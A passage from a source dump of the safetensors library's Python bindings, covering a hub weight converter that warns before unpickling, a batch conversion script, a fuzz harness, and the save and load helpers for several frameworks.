+ config = json.load(f)
224
+ architecture = config['architectures'][0]
225
+ class_ = getattr(transformers, architecture)
226
+ discard_names = getattr(class_, '_tied_weights_keys', [])
227
+ except Exception:
228
+ discard_names = []
229
+ return discard_names
230
+
231
+ class AlreadyExists(Exception):
232
+ pass
233
+
234
+ def check_file_size(sf_filename: str, pt_filename: str):
235
+ sf_size = os.stat(sf_filename).st_size
236
+ pt_size = os.stat(pt_filename).st_size
237
+ if (sf_size - pt_size) / pt_size > 0.01:
238
+ raise RuntimeError(f'The file size different is more than 1%:\n - {sf_filename}: {sf_size}\n - {pt_filename}: {pt_size}\n ')
239
+
240
+ def rename(pt_filename: str) -> str:
241
+ (filename, ext) = os.path.splitext(pt_filename)
242
+ local = f'{filename}.safetensors'
243
+ local = local.replace('pytorch_model', 'model')
244
+ return local
245
+
246
+ def convert_multi(model_id: str, *, revision=Optional[str], folder: str, token: Optional[str], discard_names: List[str]) -> ConversionResult:
247
+ filename = hf_hub_download(repo_id=model_id, revision=revision, filename='pytorch_model.bin.index.json', token=token, cache_dir=folder)
248
+ with open(filename, 'r') as f:
249
+ data = json.load(f)
250
+ filenames = set(data['weight_map'].values())
251
+ local_filenames = []
252
+ for filename in filenames:
253
+ pt_filename = hf_hub_download(repo_id=model_id, filename=filename, token=token, cache_dir=folder)
254
+ sf_filename = rename(pt_filename)
255
+ sf_filename = os.path.join(folder, sf_filename)
256
+ convert_file(pt_filename, sf_filename, discard_names=discard_names)
257
+ local_filenames.append(sf_filename)
258
+ index = os.path.join(folder, 'model.safetensors.index.json')
259
+ with open(index, 'w') as f:
260
+ newdata = {k: v for (k, v) in data.items()}
261
+ newmap = {k: rename(v) for (k, v) in data['weight_map'].items()}
262
+ newdata['weight_map'] = newmap
263
+ json.dump(newdata, f, indent=4)
264
+ local_filenames.append(index)
265
+ operations = [CommitOperationAdd(path_in_repo=os.path.basename(local), path_or_fileobj=local) for local in local_filenames]
266
+ errors: List[Tuple[str, 'Exception']] = []
267
+ return (operations, errors)
268
+
269
+ def convert_single(model_id: str, *, revision: Optional[str], folder: str, token: Optional[str], discard_names: List[str]) -> ConversionResult:
270
+ pt_filename = hf_hub_download(repo_id=model_id, revision=revision, filename='pytorch_model.bin', token=token, cache_dir=folder)
271
+ sf_name = 'model.safetensors'
272
+ sf_filename = os.path.join(folder, sf_name)
273
+ convert_file(pt_filename, sf_filename, discard_names)
274
+ operations = [CommitOperationAdd(path_in_repo=sf_name, path_or_fileobj=sf_filename)]
275
+ errors: List[Tuple[str, 'Exception']] = []
276
+ return (operations, errors)
277
+
278
+ def convert_file(pt_filename: str, sf_filename: str, discard_names: List[str]):
279
+ loaded = torch.load(pt_filename, map_location='cpu')
280
+ if 'state_dict' in loaded:
281
+ loaded = loaded['state_dict']
282
+ to_removes = _remove_duplicate_names(loaded, discard_names=discard_names)
283
+ metadata = {'format': 'pt'}
284
+ for (kept_name, to_remove_group) in to_removes.items():
285
+ for to_remove in to_remove_group:
286
+ if to_remove not in metadata:
287
+ metadata[to_remove] = kept_name
288
+ del loaded[to_remove]
289
+ loaded = {k: v.contiguous() for (k, v) in loaded.items()}
290
+ dirname = os.path.dirname(sf_filename)
291
+ os.makedirs(dirname, exist_ok=True)
292
+ save_file(loaded, sf_filename, metadata=metadata)
293
+ check_file_size(sf_filename, pt_filename)
294
+ reloaded = load_file(sf_filename)
295
+ for k in loaded:
296
+ pt_tensor = loaded[k]
297
+ sf_tensor = reloaded[k]
298
+ if not torch.equal(pt_tensor, sf_tensor):
299
+ raise RuntimeError(f'The output tensors do not match for key {k}')
300
+
301
+ def create_diff(pt_infos: Dict[str, List[str]], sf_infos: Dict[str, List[str]]) -> str:
302
+ errors = []
303
+ for key in ['missing_keys', 'mismatched_keys', 'unexpected_keys']:
304
+ pt_set = set(pt_infos[key])
305
+ sf_set = set(sf_infos[key])
306
+ pt_only = pt_set - sf_set
307
+ sf_only = sf_set - pt_set
308
+ if pt_only:
309
+ errors.append(f'{key} : PT warnings contain {pt_only} which are not present in SF warnings')
310
+ if sf_only:
311
+ errors.append(f'{key} : SF warnings contain {sf_only} which are not present in PT warnings')
312
+ return '\n'.join(errors)
313
+
314
+ def previous_pr(api: 'HfApi', model_id: str, pr_title: str, revision=Optional[str]) -> Optional['Discussion']:
315
+ try:
316
+ revision_commit = api.model_info(model_id, revision=revision).sha
317
+ discussions = api.get_repo_discussions(repo_id=model_id)
318
+ except Exception:
319
+ return None
320
+ for discussion in discussions:
321
+ if discussion.status in {'open', 'closed'} and discussion.is_pull_request and (discussion.title == pr_title):
322
+ commits = api.list_repo_commits(model_id, revision=discussion.git_reference)
323
+ if revision_commit == commits[1].commit_id:
324
+ return discussion
325
+ return None
326
+
327
+ def convert_generic(model_id: str, *, revision=Optional[str], folder: str, filenames: Set[str], token: Optional[str]) -> ConversionResult:
328
+ operations = []
329
+ errors = []
330
+ extensions = set(['.bin', '.ckpt'])
331
+ for filename in filenames:
332
+ (prefix, ext) = os.path.splitext(filename)
333
+ if ext in extensions:
334
+ pt_filename = hf_hub_download(model_id, revision=revision, filename=filename, token=token, cache_dir=folder)
335
+ (dirname, raw_filename) = os.path.split(filename)
336
+ if raw_filename == 'pytorch_model.bin':
337
+ sf_in_repo = os.path.join(dirname, 'model.safetensors')
338
+ else:
339
+ sf_in_repo = f'{prefix}.safetensors'
340
+ sf_filename = os.path.join(folder, sf_in_repo)
341
+ try:
342
+ convert_file(pt_filename, sf_filename, discard_names=[])
343
+ operations.append(CommitOperationAdd(path_in_repo=sf_in_repo, path_or_fileobj=sf_filename))
344
+ except Exception as e:
345
+ errors.append((pt_filename, e))
346
+ return (operations, errors)
347
+
348
+ def convert(api: 'HfApi', model_id: str, revision: Optional[str]=None, force: bool=False) -> Tuple['CommitInfo', List[Tuple[str, 'Exception']]]:
349
+ pr_title = 'Adding `safetensors` variant of this model'
350
+ info = api.model_info(model_id, revision=revision)
351
+ filenames = set((s.rfilename for s in info.siblings))
352
+ with TemporaryDirectory() as d:
353
+ folder = os.path.join(d, repo_folder_name(repo_id=model_id, repo_type='models'))
354
+ os.makedirs(folder)
355
+ new_pr = None
356
+ try:
357
+ operations = None
358
+ pr = previous_pr(api, model_id, pr_title, revision=revision)
359
+ library_name = getattr(info, 'library_name', None)
360
+ if any((filename.endswith('.safetensors') for filename in filenames)) and (not force):
361
+ raise AlreadyExists(f'Model {model_id} is already converted, skipping..')
362
+ elif pr is not None and (not force):
363
+ url = f'https://huggingface.co/{model_id}/discussions/{pr.num}'
364
+ new_pr = pr
365
+ raise AlreadyExists(f'Model {model_id} already has an open PR check out {url}')
366
+ elif library_name == 'transformers':
367
+ discard_names = get_discard_names(model_id, revision=revision, folder=folder, token=api.token)
368
+ if 'pytorch_model.bin' in filenames:
369
+ (operations, errors) = convert_single(model_id, revision=revision, folder=folder, token=api.token, discard_names=discard_names)
370
+ elif 'pytorch_model.bin.index.json' in filenames:
371
+ (operations, errors) = convert_multi(model_id, revision=revision, folder=folder, token=api.token, discard_names=discard_names)
372
+ else:
373
+ raise RuntimeError(f"Model {model_id} doesn't seem to be a valid pytorch model. Cannot convert")
374
+ else:
375
+ (operations, errors) = convert_generic(model_id, revision=revision, folder=folder, filenames=filenames, token=api.token)
376
+ if operations:
377
+ new_pr = api.create_commit(repo_id=model_id, revision=revision, operations=operations, commit_message=pr_title, commit_description=COMMIT_DESCRIPTION, create_pr=True)
378
+ print(f'Pr created at {new_pr.pr_url}')
379
+ else:
380
+ print('No files to convert')
381
+ finally:
382
+ shutil.rmtree(folder)
383
+ return (new_pr, errors)
384
+ if __name__ == '__main__':
385
+ DESCRIPTION = '\n Simple utility tool to convert automatically some weights on the hub to `safetensors` format.\n It is PyTorch exclusive for now.\n It works by downloading the weights (PT), converting them locally, and uploading them back\n as a PR on the hub.\n '
386
+ parser = argparse.ArgumentParser(description=DESCRIPTION)
387
+ parser.add_argument('model_id', type=str, help='The name of the model on the hub to convert. E.g. `gpt2` or `facebook/wav2vec2-base-960h`')
388
+ parser.add_argument('--revision', type=str, help='The revision to convert')
389
+ parser.add_argument('--force', action='store_true', help='Create the PR even if it already exists of if the model was already converted.')
390
+ parser.add_argument('-y', action='store_true', help='Ignore safety prompt')
391
+ args = parser.parse_args()
392
+ model_id = args.model_id
393
+ api = HfApi()
394
+ if args.y:
395
+ txt = 'y'
396
+ else:
397
+ txt = input('This conversion script will unpickle a pickled file, which is inherently unsafe. If you do not trust this file, we invite you to use https://huggingface.co/spaces/safetensors/convert or google colab or other hosted solution to avoid potential issues with this file. Continue [Y/n] ?')
398
+ if txt.lower() in {'', 'y'}:
399
+ (commit_info, errors) = convert(api, model_id, revision=args.revision, force=args.force)
400
+ string = f'\n### Success 🔥\nYay! This model was successfully converted and a PR was open using your token, here:\n[{commit_info.pr_url}]({commit_info.pr_url})\n '
401
+ if errors:
402
+ string += '\nErrors during conversion:\n'
403
+ string += '\n'.join((f'Error while converting {filename}: {e}, skipped conversion' for (filename, e) in errors))
404
+ print(string)
405
+ else:
406
+ print(f'Answer was `{txt}` aborting.')
407
+
408
+ # File: safetensors-main/bindings/python/convert_all.py
409
+ """"""
410
+ from convert import AlreadyExists, convert
411
+ from huggingface_hub import HfApi, ModelFilter, ModelSearchArguments
412
+ from transformers import AutoConfig
413
+ if __name__ == '__main__':
414
+ api = HfApi()
415
+ args = ModelSearchArguments()
416
+ total = 50
417
+ models = list(api.list_models(filter=ModelFilter(library=args.library.Transformers), sort='downloads', direction=-1))[:total]
418
+ correct = 0
419
+ errors = set()
420
+ for model in models:
421
+ model = api.model_info(model.id, files_metadata=True)
422
+ size = None
423
+ for sibling in model.siblings:
424
+ if sibling.rfilename == 'pytorch_model.bin':
425
+ size = sibling.size
426
+ if size is None or size > 2000000000:
427
+ print(f'[{model.downloads}] Skipping {model.modelId} (too large {size})')
428
+ continue
429
+ model_id = model.modelId
430
+ print(f'[{model.downloads}] {model.modelId}')
431
+ try:
432
+ convert(api, model_id)
433
+ correct += 1
434
+ except AlreadyExists as e:
435
+ correct += 1
436
+ print(e)
437
+ except Exception as e:
438
+ config = AutoConfig.from_pretrained(model_id)
439
+ errors.add(config.__class__.__name__)
440
+ print(e)
441
+ print(f'Errors: {errors}')
442
+ print(f'File size is difference {len(errors)}')
443
+ print(f'Correct rate {correct}/{total} ({correct / total * 100:.2f}%)')
444
+
445
+ # File: safetensors-main/bindings/python/fuzz.py
446
+ import datetime
447
+ import sys
448
+ import tempfile
449
+ from collections import defaultdict
450
+ import atheris
451
+ with atheris.instrument_imports():
452
+ from safetensors.torch import load_file
453
+ EXCEPTIONS = defaultdict(int)
454
+ START = datetime.datetime.now()
455
+ DT = datetime.timedelta(seconds=30)
456
+
457
+ def TestOneInput(data):
458
+ global START
459
+ with tempfile.NamedTemporaryFile() as f:
460
+ f.write(data)
461
+ f.seek(0)
462
+ try:
463
+ load_file(f.name, device=0)
464
+ except Exception as e:
465
+ EXCEPTIONS[str(e)] += 1
466
+ if datetime.datetime.now() - START > DT:
467
+ for (e, n) in EXCEPTIONS.items():
468
+ print(e, n)
469
+ START = datetime.datetime.now()
470
+ atheris.Setup(sys.argv, TestOneInput)
471
+ atheris.Fuzz()
472
+
473
+ # File: safetensors-main/bindings/python/py_src/safetensors/flax.py
474
+ import os
475
+ from typing import Dict, Optional, Union
476
+ import numpy as np
477
+ import jax.numpy as jnp
478
+ from jax import Array
479
+ from safetensors import numpy, safe_open
480
+
481
+ def save(tensors: Dict[str, Array], metadata: Optional[Dict[str, str]]=None) -> bytes:
482
+ np_tensors = _jnp2np(tensors)
483
+ return numpy.save(np_tensors, metadata=metadata)
484
+
485
+ def save_file(tensors: Dict[str, Array], filename: Union[str, os.PathLike], metadata: Optional[Dict[str, str]]=None) -> None:
486
+ np_tensors = _jnp2np(tensors)
487
+ return numpy.save_file(np_tensors, filename, metadata=metadata)
488
+
489
+ def load(data: bytes) -> Dict[str, Array]:
490
+ flat = numpy.load(data)
491
+ return _np2jnp(flat)
492
+
493
+ def load_file(filename: Union[str, os.PathLike]) -> Dict[str, Array]:
494
+ result = {}
495
+ with safe_open(filename, framework='flax') as f:
496
+ for k in f.keys():
497
+ result[k] = f.get_tensor(k)
498
+ return result
499
+
500
+ def _np2jnp(numpy_dict: Dict[str, np.ndarray]) -> Dict[str, Array]:
501
+ for (k, v) in numpy_dict.items():
502
+ numpy_dict[k] = jnp.array(v)
503
+ return numpy_dict
504
+
505
+ def _jnp2np(jnp_dict: Dict[str, Array]) -> Dict[str, np.array]:
506
+ for (k, v) in jnp_dict.items():
507
+ jnp_dict[k] = np.asarray(v)
508
+ return jnp_dict
509
+
510
+ # File: safetensors-main/bindings/python/py_src/safetensors/mlx.py
511
+ import os
512
+ from typing import Dict, Optional, Union
513
+ import numpy as np
514
+ import mlx.core as mx
515
+ from safetensors import numpy, safe_open
516
+
517
+ def save(tensors: Dict[str, mx.array], metadata: Optional[Dict[str, str]]=None) -> bytes:
518
+ np_tensors = _mx2np(tensors)
519
+ return numpy.save(np_tensors, metadata=metadata)
520
+
521
+ def save_file(tensors: Dict[str, mx.array], filename: Union[str, os.PathLike], metadata: Optional[Dict[str, str]]=None) -> None:
522
+ np_tensors = _mx2np(tensors)
523
+ return numpy.save_file(np_tensors, filename, metadata=metadata)
524
+
525
+ def load(data: bytes) -> Dict[str, mx.array]:
526
+ flat = numpy.load(data)
527
+ return _np2mx(flat)
528
+
529
+ def load_file(filename: Union[str, os.PathLike]) -> Dict[str, mx.array]:
530
+ result = {}
531
+ with safe_open(filename, framework='mlx') as f:
532
+ for k in f.keys():
533
+ result[k] = f.get_tensor(k)
534
+ return result
535
+
536
+ def _np2mx(numpy_dict: Dict[str, np.ndarray]) -> Dict[str, mx.array]:
537
+ for (k, v) in numpy_dict.items():
538
+ numpy_dict[k] = mx.array(v)
539
+ return numpy_dict
540
+
541
+ def _mx2np(mx_dict: Dict[str, mx.array]) -> Dict[str, np.array]:
542
+ new_dict = {}
543
+ for (k, v) in mx_dict.items():
544
+ new_dict[k] = np.asarray(v)
545
+ return new_dict
546
+
547
+ # File: safetensors-main/bindings/python/py_src/safetensors/numpy.py
548
+ import os
549
+ import sys
550
+ from typing import Dict, Optional, Union
551
+ import numpy as np
552
+ from safetensors import deserialize, safe_open, serialize, serialize_file
553
+
554
+ def _tobytes(tensor: np.ndarray) -> bytes:
555
+ if not _is_little_endian(tensor):
556
+ tensor = tensor.byteswap(inplace=False)
557
+ return tensor.tobytes()
558
+
559
+ def save(tensor_dict: Dict[str, np.ndarray], metadata: Optional[Dict[str, str]]=None) -> bytes:
560
+ flattened = {k: {'dtype': v.dtype.name, 'shape': v.shape, 'data': _tobytes(v)} for (k, v) in tensor_dict.items()}
561
+ serialized = serialize(flattened, metadata=metadata)
562
+ result = bytes(serialized)
563
+ return result
564
+
565
+ def save_file(tensor_dict: Dict[str, np.ndarray], filename: Union[str, os.PathLike], metadata: Optional[Dict[str, str]]=None) -> None:
566
+ flattened = {k: {'dtype': v.dtype.name, 'shape': v.shape, 'data': _tobytes(v)} for (k, v) in tensor_dict.items()}
567
+ serialize_file(flattened, filename, metadata=metadata)
568
+
569
+ def load(data: bytes) -> Dict[str, np.ndarray]:
570
+ flat = deserialize(data)
571
+ return _view2np(flat)
572
+
573
+ def load_file(filename: Union[str, os.PathLike]) -> Dict[str, np.ndarray]:
574
+ result = {}
575
+ with safe_open(filename, framework='np') as f:
576
+ for k in f.keys():
577
+ result[k] = f.get_tensor(k)
578
+ return result
579
+ _TYPES = {'F64': np.float64, 'F32': np.float32, 'F16': np.float16, 'I64': np.int64, 'U64': np.uint64, 'I32': np.int32, 'U32': np.uint32, 'I16': np.int16, 'U16': np.uint16, 'I8': np.int8, 'U8': np.uint8, 'BOOL': bool}
580
+
581
+ def _getdtype(dtype_str: str) -> np.dtype:
582
+ return _TYPES[dtype_str]
583
+
584
+ def _view2np(safeview) -> Dict[str, np.ndarray]:
585
+ result = {}
586
+ for (k, v) in safeview:
587
+ dtype = _getdtype(v['dtype'])
588
+ arr = np.frombuffer(v['data'], dtype=dtype).reshape(v['shape'])
589
+ result[k] = arr
590
+ return result
591
+
592
+ def _is_little_endian(tensor: np.ndarray) -> bool:
593
+ byteorder = tensor.dtype.byteorder
594
+ if byteorder == '=':
595
+ if sys.byteorder == 'little':
596
+ return True
597
+ else:
598
+ return False
599
+ elif byteorder == '|':
600
+ return True
601
+ elif byteorder == '<':
602
+ return True
603
+ elif byteorder == '>':
604
+ return False
605
+ raise ValueError(f'Unexpected byte order {byteorder}')
606
+
607
+ # File: safetensors-main/bindings/python/py_src/safetensors/paddle.py
608
+ import os
609
+ from typing import Dict, Optional, Union
610
+ import numpy as np
611
+ import paddle
612
+ from safetensors import numpy
613
+
614
+ def save(tensors: Dict[str, paddle.Tensor], metadata: Optional[Dict[str, str]]=None) -> bytes:
615
+ np_tensors = _paddle2np(tensors)
616
+ return numpy.save(np_tensors, metadata=metadata)
617
+
618
+ def save_file(tensors: Dict[str, paddle.Tensor], filename: Union[str, os.PathLike], metadata: Optional[Dict[str, str]]=None) -> None:
619
+ np_tensors = _paddle2np(tensors)
620
+ return numpy.save_file(np_tensors, filename, metadata=metadata)
621
+
622
+ def load(data: bytes, device: str='cpu') -> Dict[str, paddle.Tensor]:
623
+ flat = numpy.load(data)
624
+ return _np2paddle(flat, device)
625
+
626
+ def load_file(filename: Union[str, os.PathLike], device='cpu') -> Dict[str, paddle.Tensor]:
627
+ flat = numpy.load_file(filename)
628
+ output = _np2paddle(flat, device)
629
+ return output
630
+
631
+ def _np2paddle(numpy_dict: Dict[str, np.ndarray], device: str='cpu') -> Dict[str, paddle.Tensor]:
632
+ for (k, v) in numpy_dict.items():
633
+ numpy_dict[k] = paddle.to_tensor(v, place=device)
634
+ return numpy_dict
635
+
636
+ def _paddle2np(paddle_dict: Dict[str, paddle.Tensor]) -> Dict[str, np.array]:
637
+ for (k, v) in paddle_dict.items():
638
+ paddle_dict[k] = v.detach().cpu().numpy()
639
+ return paddle_dict
640
+
641
+ # File: safetensors-main/bindings/python/py_src/safetensors/tensorflow.py
642
+ import os
643
+ from typing import Dict, Optional, Union
644
+ import numpy as np
645
+ import tensorflow as tf
646
+ from safetensors import numpy, safe_open
647
+
648
+ def save(tensors: Dict[str, tf.Tensor], metadata: Optional[Dict[str, str]]=None) -> bytes:
649
+ np_tensors = _tf2np(tensors)
650
+ return numpy.save(np_tensors, metadata=metadata)
651
+
652
+ def save_file(tensors: Dict[str, tf.Tensor], filename: Union[str, os.PathLike], metadata: Optional[Dict[str, str]]=None) -> None:
653
+ np_tensors = _tf2np(tensors)
654
+ return numpy.save_file(np_tensors, filename, metadata=metadata)
655
+
656
+ def load(data: bytes) -> Dict[str, tf.Tensor]:
657
+ flat = numpy.load(data)
658
+ return _np2tf(flat)
659
+
660
+ def load_file(filename: Union[str, os.PathLike]) -> Dict[str, tf.Tensor]:
661
+ result = {}
662
+ with safe_open(filename, framework='tf') as f:
663
+ for k in f.keys():
664
+ result[k] = f.get_tensor(k)
665
+ return result
666
+
667
+ def _np2tf(numpy_dict: Dict[str, np.ndarray]) -> Dict[str, tf.Tensor]:
668
+ for (k, v) in numpy_dict.items():
669
+ numpy_dict[k] = tf.convert_to_tensor(v)
670
+ return numpy_dict
671
+
672
+ def _tf2np(tf_dict: Dict[str, tf.Tensor]) -> Dict[str, np.array]:
673
+ for (k, v) in tf_dict.items():
674
+ tf_dict[k] = v.numpy()
675
+ return tf_dict
676
+
677
+ # File: safetensors-main/bindings/python/py_src/safetensors/torch.py
678
+ import os
679
+ import sys
680
+ from collections import defaultdict
681
+ from typing import Any, Dict, List, Optional, Set, Tuple, Union
682
+ import torch
683
+ from safetensors import deserialize, safe_open, serialize, serialize_file
684
+
685
+ def storage_ptr(tensor: torch.Tensor) -> int:
686
+ try:
687
+ return tensor.untyped_storage().data_ptr()
688
+ except Exception:
689
+ try:
690
+ return tensor.storage().data_ptr()
691
+ except NotImplementedError:
692
+ return 0
693
+
694
+ def _end_ptr(tensor: torch.Tensor) -> int:
695
+ if tensor.nelement():
696
+ stop = tensor.view(-1)[-1].data_ptr() + _SIZE[tensor.dtype]
697
+ else:
698
+ stop = tensor.data_ptr()
699
+ return stop
700
+
701
+ def storage_size(tensor: torch.Tensor) -> int:
702
+ try:
703
+ return tensor.untyped_storage().nbytes()
704
+ except AttributeError:
705
+ try:
706
+ return tensor.storage().size() * _SIZE[tensor.dtype]
707
+ except NotImplementedError:
708
+ return tensor.nelement() * _SIZE[tensor.dtype]
709
+
710
+ def _filter_shared_not_shared(tensors: List[Set[str]], state_dict: Dict[str, torch.Tensor]) -> List[Set[str]]:
711
+ filtered_tensors = []
712
+ for shared in tensors:
713
+ if len(shared) < 2:
714
+ filtered_tensors.append(shared)
715
+ continue
716
+ areas = []
717
+ for name in shared:
718
+ tensor = state_dict[name]
719
+ areas.append((tensor.data_ptr(), _end_ptr(tensor), name))
720
+ areas.sort()
721
+ (_, last_stop, last_name) = areas[0]
722
+ filtered_tensors.append({last_name})
723
+ for (start, stop, name) in areas[1:]:
724
+ if start >= last_stop:
725
+ filtered_tensors.append({name})
726
+ else:
727
+ filtered_tensors[-1].add(name)
728
+ last_stop = stop
729
+ return filtered_tensors
730
+
731
+ def _find_shared_tensors(state_dict: Dict[str, torch.Tensor]) -> List[Set[str]]:
732
+ tensors = defaultdict(set)
733
+ for (k, v) in state_dict.items():
734
+ if v.device != torch.device('meta') and storage_ptr(v) != 0 and (storage_size(v) != 0):
735
+ tensors[v.device, storage_ptr(v), storage_size(v)].add(k)
736
+ tensors = list(sorted(tensors.values()))
737
+ tensors = _filter_shared_not_shared(tensors, state_dict)
738
+ return tensors
739
+
740
+ def _is_complete(tensor: torch.Tensor) -> bool:
741
+ return tensor.data_ptr() == storage_ptr(tensor) and tensor.nelement() * _SIZE[tensor.dtype] == storage_size(tensor)
742
+
743
+ def _remove_duplicate_names(state_dict: Dict[str, torch.Tensor], *, preferred_names: Optional[List[str]]=None, discard_names: Optional[List[str]]=None) -> Dict[str, List[str]]:
744
+ if preferred_names is None:
745
+ preferred_names = []
746
+ preferred_names = set(preferred_names)
747
+ if discard_names is None:
748
+ discard_names = []
749
+ discard_names = set(discard_names)
750
+ shareds = _find_shared_tensors(state_dict)
751
+ to_remove = defaultdict(list)
752
+ for shared in shareds:
753
+ complete_names = set([name for name in shared if _is_complete(state_dict[name])])
754
+ if not complete_names:
755
+ raise RuntimeError(f'Error while trying to find names to remove to save state dict, but found no suitable name to keep for saving amongst: {shared}. None is covering the entire storage.Refusing to save/load the model since you could be storing much more memory than needed. Please refer to https://huggingface.co/docs/safetensors/torch_shared_tensors for more information. Or open an issue.')
756
+ keep_name = sorted(list(complete_names))[0]
757
+ preferred = complete_names.difference(discard_names)
758
+ if preferred:
759
+ keep_name = sorted(list(preferred))[0]
760
+ if preferred_names:
761
+ preferred = preferred_names.intersection(complete_names)
762
+ if preferred:
763
+ keep_name = sorted(list(preferred))[0]
764
+ for name in sorted(shared):
765
+ if name != keep_name:
766
+ to_remove[keep_name].append(name)
767
+ return to_remove
768
+
769
+ def save_model(model: torch.nn.Module, filename: str, metadata: Optional[Dict[str, str]]=None, force_contiguous: bool=True):
770
+ state_dict = model.state_dict()
771
+ to_removes = _remove_duplicate_names(state_dict)
772
+ for (kept_name, to_remove_group) in to_removes.items():
773
+ for to_remove in to_remove_group:
774
+ if metadata is None:
775
+ metadata = {}
776
+ if to_remove not in metadata:
777
+ metadata[to_remove] = kept_name
778
+ del state_dict[to_remove]
779
+ if force_contiguous:
780
+ state_dict = {k: v.contiguous() for (k, v) in state_dict.items()}
781
+ try:
782
+ save_file(state_dict, filename, metadata=metadata)
783
+ except ValueError as e:
784
+ msg = str(e)
785
+ msg += ' Or use save_model(..., force_contiguous=True), read the docs for potential caveats.'
786
+ raise ValueError(msg)
787
+
788
+ def load_model(model: torch.nn.Module, filename: Union[str, os.PathLike], strict: bool=True, device: Union[str, int]='cpu') -> Tuple[List[str], List[str]]:
789
+ state_dict = load_file(filename, device=device)
790
+ model_state_dict = model.state_dict()
791
+ to_removes = _remove_duplicate_names(model_state_dict, preferred_names=state_dict.keys())
792
+ (missing, unexpected) = model.load_state_dict(state_dict, strict=False)
793
+ missing = set(missing)
794
+ for to_remove_group in to_removes.values():
795
+ for to_remove in to_remove_group:
796
+ if to_remove not in missing:
797
+ unexpected.append(to_remove)
798
+ else:
799
+ missing.remove(to_remove)
800
+ if strict and (missing or unexpected):
801
+ missing_keys = ', '.join([f'"{k}"' for k in sorted(missing)])
802
+ unexpected_keys = ', '.join([f'"{k}"' for k in sorted(unexpected)])
803
+ error = f'Error(s) in loading state_dict for {model.__class__.__name__}:'
804
+ if missing:
805
+ error += f'\n Missing key(s) in state_dict: {missing_keys}'
806
+ if unexpected:
807
+ error += f'\n Unexpected key(s) in state_dict: {unexpected_keys}'
808
+ raise RuntimeError(error)
809
+ return (missing, unexpected)
810
+
811
+ def save(tensors: Dict[str, torch.Tensor], metadata: Optional[Dict[str, str]]=None) -> bytes:
812
+ serialized = serialize(_flatten(tensors), metadata=metadata)
813
+ result = bytes(serialized)
814
+ return result
815
+
816
+ def save_file(tensors: Dict[str, torch.Tensor], filename: Union[str, os.PathLike], metadata: Optional[Dict[str, str]]=None):
817
+ serialize_file(_flatten(tensors), filename, metadata=metadata)
818
+
819
+ def load_file(filename: Union[str, os.PathLike], device: Union[str, int]='cpu') -> Dict[str, torch.Tensor]:
820
+ result = {}
821
+ with safe_open(filename, framework='pt', device=device) as f:
822
+ for k in f.keys():
823
+ result[k] = f.get_tensor(k)
824
+ return result
825
+
826
+ def load(data: bytes) -> Dict[str, torch.Tensor]:
827
+ flat = deserialize(data)
828
+ return _view2torch(flat)
829
+ _float8_e4m3fn = getattr(torch, 'float8_e4m3fn', None)
830
+ _float8_e5m2 = getattr(torch, 'float8_e5m2', None)
831
+ _SIZE = {torch.int64: 8, torch.float32: 4, torch.int32: 4, torch.bfloat16: 2, torch.float16: 2, torch.int16: 2, torch.uint8: 1, torch.int8: 1, torch.bool: 1, torch.float64: 8, _float8_e4m3fn: 1, _float8_e5m2: 1}
832
+ _TYPES = {'F64': torch.float64, 'F32': torch.float32, 'F16': torch.float16, 'BF16': torch.bfloat16, 'I64': torch.int64, 'I32': torch.int32, 'I16': torch.int16, 'I8': torch.int8, 'U8': torch.uint8, 'BOOL': torch.bool, 'F8_E4M3': _float8_e4m3fn, 'F8_E5M2': _float8_e5m2}
833
+
834
+ def _getdtype(dtype_str: str) -> torch.dtype:
835
+ return _TYPES[dtype_str]
836
+
837
+ def _view2torch(safeview) -> Dict[str, torch.Tensor]:
838
+ result = {}
839
+ for (k, v) in safeview:
840
+ dtype = _getdtype(v['dtype'])
841
+ if len(v['data']) == 0:
842
+ assert any((x == 0 for x in v['shape']))
843
+ arr = torch.empty(v['shape'], dtype=dtype)
844
+ else:
845
+ arr = torch.frombuffer(v['data'], dtype=dtype).reshape(v['shape'])
846
+ if sys.byteorder == 'big':
847
+ arr = torch.from_numpy(arr.numpy().byteswap(inplace=False))
848
+ result[k] = arr
849
+ return result
850
+
851
+ def _tobytes(tensor: torch.Tensor, name: str) -> bytes:
852
+ if tensor.layout != torch.strided:
853
+ raise ValueError(f'You are trying to save a sparse tensor: `{name}` which this library does not support. You can make it a dense tensor before saving with `.to_dense()` but be aware this might make a much larger file than needed.')
854
+ if not tensor.is_contiguous():
855
+ raise ValueError(f"You are trying to save a non contiguous tensor: `{name}` which is not allowed. It either means you are trying to save tensors which are reference of each other in which case it's recommended to save only the full tensors, and reslice at load time, or simply call `.contiguous()` on your tensor to pack it before saving.")
856
+ if tensor.device.type != 'cpu':
857
+ tensor = tensor.to('cpu')
858
+ import ctypes
859
+ import numpy as np
860
+ length = int(np.prod(tensor.shape).item())
861
+ bytes_per_item = _SIZE[tensor.dtype]
862
+ total_bytes = length * bytes_per_item
863
+ ptr = tensor.data_ptr()
864
+ if ptr == 0:
865
+ return b''
866
+ newptr = ctypes.cast(ptr, ctypes.POINTER(ctypes.c_ubyte))
867
+ data = np.ctypeslib.as_array(newptr, (total_bytes,))
868
+ if sys.byteorder == 'big':
869
+ NPDTYPES = {torch.int64: np.int64, torch.float32: np.float32, torch.int32: np.int32, torch.bfloat16: np.float16, torch.float16: np.float16, torch.int16: np.int16, torch.uint8: np.uint8, torch.int8: np.int8, torch.bool: bool, torch.float64: np.float64, _float8_e4m3fn: np.uint8, _float8_e5m2: np.uint8}
870
+ npdtype = NPDTYPES[tensor.dtype]
871
+ data = data.view(npdtype).byteswap(inplace=False)
872
+ return data.tobytes()
873
+
874
+ def _flatten(tensors: Dict[str, torch.Tensor]) -> Dict[str, Dict[str, Any]]:
875
+ if not isinstance(tensors, dict):
876
+ raise ValueError(f'Expected a dict of [str, torch.Tensor] but received {type(tensors)}')
877
+ invalid_tensors = []
878
+ for (k, v) in tensors.items():
879
+ if not isinstance(v, torch.Tensor):
880
+ raise ValueError(f'Key `{k}` is invalid, expected torch.Tensor but received {type(v)}')
881
+ if v.layout != torch.strided:
882
+ invalid_tensors.append(k)
883
+ if invalid_tensors:
884
+ raise ValueError(f'You are trying to save a sparse tensors: `{invalid_tensors}` which this library does not support. You can make it a dense tensor before saving with `.to_dense()` but be aware this might make a much larger file than needed.')
885
+ shared_pointers = _find_shared_tensors(tensors)
886
+ failing = []
887
+ for names in shared_pointers:
888
+ if len(names) > 1:
889
+ failing.append(names)
890
+ if failing:
891
+ raise RuntimeError(f'\n Some tensors share memory, this will lead to duplicate memory on disk and potential differences when loading them again: {failing}.\n A potential way to correctly save your model is to use `save_model`.\n More information at https://huggingface.co/docs/safetensors/torch_shared_tensors\n ')
892
